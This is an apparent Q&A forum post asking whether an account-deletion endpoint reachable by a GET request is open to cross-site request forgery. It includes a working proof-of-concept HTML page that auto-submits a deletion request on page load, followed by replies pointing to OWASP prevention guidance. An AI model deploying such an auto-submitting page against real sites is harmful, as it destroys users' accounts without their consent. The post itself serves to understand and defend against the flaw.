CSRF Attack - Get Request
I came across a situation where an account deletion endpoint on a web application can be triggered by a simple GET request. I'm not sure whether this is a security vulnerability or not, so I’m looking for some clarification.
<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Attack</title>
  </head>
  <body>
    <form
      action="http://192.168.29.129/accounts/delete-account/20/"
      method="get"
      class="form-card"
    >
    </form>

    <script>
      window.onload = function () {
        document.querySelector('.form-card').submit();
      };
    </script>
  </body>
</html>



What Happens:

The form targets the delete-account/20/ URL, which triggers the
deletion of an account (in this case, account ID 20).

The form uses the GET method, which is typically used for fetching
data, not for making changes (like deleting accounts).

There is no CSRF token or any other form of validation in the
request.


Potential Issue:
If a user is logged into the application (and has an active session), could an attacker create a page like this to delete the user's account without their consent?
Would this be considered a Cross-Site Request Forgery (CSRF) vulnerability?
I understand that GET requests are supposed to be safe and idempotent, but it seems like in this case, a GET request is being used for a sensitive action. Could this lead to unintended consequences like account deletion via CSRF?
My Questions:

Is using a GET request for an action like account deletion considered a security
vulnerability?
Does this scenario qualify as a CSRF attack?
What steps should be taken to protect against this type of vulnerability?


https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html yes, this is an issue, there are multiple ways to prevent it.

why downvote???

I've downvoted because your question doesn't focus on a single problem. Furthermore two of the questions you are asking will lead to opinionated answers, making the question off-topic - Please have a look at the [tour] and [ask]

And all of the answers are in the document I linked, no need to duplicate it on SO nor can it really be duplicated because the information is far to extensive.
